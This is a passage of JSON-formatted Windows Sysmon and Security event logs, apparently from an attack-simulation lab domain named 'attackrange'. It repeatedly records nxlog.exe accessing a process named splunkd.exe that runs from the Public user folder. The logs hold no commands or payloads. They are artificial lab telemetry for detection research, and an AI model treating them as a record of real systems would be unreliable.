(x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:42.474","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:52:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:42","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220400,"ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-1008\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x4AEE5\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-634332812-1885290706-2582043485-1008","TargetUserName":"WIN-DC-8400769$","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x4aee5","LogonType":"3","EventReceivedTime":"2020-08-01 06:52:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4263,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:43.475\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:43.475","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:44","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4264,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:44.476\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:44.476","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:45","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4265,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:45.477\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:45.477","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4266,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:46.478\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:46.478","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:52:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4267,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:47.478\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:47.478","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:52:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:48","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4268,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:48.479\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:48.479","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files 